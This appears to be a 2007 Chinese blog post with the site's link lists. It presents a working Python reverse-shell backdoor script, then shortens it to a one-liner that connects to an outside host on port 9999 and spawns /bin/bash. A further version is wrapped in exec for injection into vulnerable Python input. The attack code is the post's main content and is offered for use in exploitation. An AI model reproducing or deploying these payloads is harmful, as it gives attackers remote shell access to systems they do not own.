在漏洞利用Python代码真的很爽


Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

Python 相关文章推荐
Python2.x与Python3.x的区别
Jan 14 Python
Python数据结构之翻转链表
Feb 25 Python
python Matplotlib画图之调整字体大小的示例
Nov 20 Python
python让列表倒序输出的实例
Jun 25 Python
Python使用Flask-SQLAlchemy连接数据库操作示例
Aug 31 Python
python中嵌套函数的实操步骤
Feb 27 Python
Python 通过打码平台实现验证码的实现
May 13 Python
python调用接口的4种方式代码实例
Nov 19 Python
python数据处理——对pandas进行数据变频或插值实例
Apr 22 Python
django ObjectDoesNotExist 和 DoesNotExist的用法
Jul 09 Python
python实现邮件循环自动发件功能
Sep 11 Python
详解Python中下划线的5种含义
Jul 15 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
You might like
php实现的网络相册图片防盗链完美破解方法
2015/07/01 PHP
windows server 2008/2012安装php iis7 mysql环境搭建教程
2016/06/30 PHP
利用js对象弹出一个层
2008/03/26 Javascript
jQuery 处理网页内容的实现代码
2010/02/15 Javascript
jQuery实现页面顶部显示的进度条效果完整实例
2015/12/09 Javascript
nodejs如何获取时间戳与时间差
2016/08/03 NodeJs
HTML5基于Tomcat 7.0实现WebSocket连接并实现简单的实时聊天
2016/10/31 Javascript
JS实现的简单轮播图运动效果示例
2016/12/22 Javascript
js生成随机颜色方法代码分享(三种)
2016/12/29 Javascript
解决Node.js使用MySQL出现connect ECONNREFUSED 127.0.0.1:3306的问题
2017/03/09 Javascript
Angular2 组件通信的实例代码
2017/06/23 Javascript
Vue组件化通讯的实例代码
2017/06/23 Javascript
Vue2.0+ElementUI实现表格翻页的实例
2017/10/23 Javascript
Javascript 编码约定(编码规范)
2018/03/11 Javascript
jQuery实现的简单日历组件定义与用法示例
2018/12/24 jQuery
微信小程序如何再次获取用户授权的方法
2019/05/10 Javascript
记一次react前端项目打包优化的方法
2020/03/30 Javascript
python获取糗百图片代码实例
2013/12/18 Python
Python中列表、字典、元组、集合数据结构整理
2014/11/20 Python
Python爬虫实现百度图片自动下载
2018/02/04 Python
Python cookbook(数据结构与算法)实现优先级队列的方法示例
2018/02/18 Python
钉钉群自定义机器人消息Python封装的实例
2019/02/20 Python
如何分离django中的媒体、静态文件和网页
2019/11/12 Python
python保留小数位的三种实现方法
2020/01/07 Python
css3 按钮样式简单可扩展创建
2013/03/18 HTML / CSS
html5本地存储 localStorage操作使用详解
2016/09/20 HTML / CSS
爱尔兰最大的体育零售商:Life Style Sports
2019/06/12 全球购物
.net开发工程师面试题
2014/02/25 面试题
建筑工程管理专业自荐信范文
2013/12/28 职场文书
数据保密承诺书
2014/06/03 职场文书
珠宝的促销活动方案
2014/08/31 职场文书
高考诚信考试承诺书
2015/04/29 职场文书
2016党校培训心得体会
2016/01/07 职场文书
反邪教学习心得体会
2016/01/15 职场文书
人为什么会“幸灾乐祸”?
2019/08/06 职场文书
Python初识逻辑与if语句及用法大全
2021/08/07 Python